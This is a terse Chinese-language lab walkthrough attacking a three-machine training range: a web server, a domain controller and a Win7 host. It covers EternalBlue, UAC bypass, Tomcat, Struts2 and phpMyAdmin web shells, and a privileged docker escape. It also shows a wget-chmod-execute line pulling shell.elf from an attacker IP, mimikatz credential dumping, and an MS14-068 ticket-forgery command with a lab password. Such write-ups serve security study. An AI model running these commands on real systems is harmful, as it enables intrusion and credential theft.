这次环境是3台机器,
web服务器:000000 、DC:000000ydc. 、 win7
web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。
所以我就进入高级模式下,修改了root用户的密码
关于虚拟机没有ipIP解决方案
然后再切到root用户修改ip
win7
这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码
这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC
,提权为system权限。然后利用这个system再创建一个管理员账号,用这个管理员账号手动关闭UAC
UAC不提示绕过
。
exploit/windows/local/bypassuac
https://blog.csdn.net/qq_45300786/article/details/111409422
上线:这里用的是tomcat的getshell
struts2的getshell
tomcat的getshell
phpmyadmin的getshell
在刚刚shell.jsp上分别执行
wget http://192.168.31.96/shell.elf
chmod 777 shell.elf
./shell.elf
docker逃逸
换思路吧
利用–privileged特权模式逃逸
权限问题
假冒临牌,再次进入shell,使用mimikatz
都是上传mimikatz获取密码
拿下域控
利用ms14-068伪造票据
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
// ms14-068.exe -u 域成员名@域名.com -s 域成员sid -d 域控制器ip地址 -p 域成员密码
有了域成员的票据后,copy到域控机上,并执行反弹
往域控上传mimikatz,拿到密码administrator/!QAZ2wsx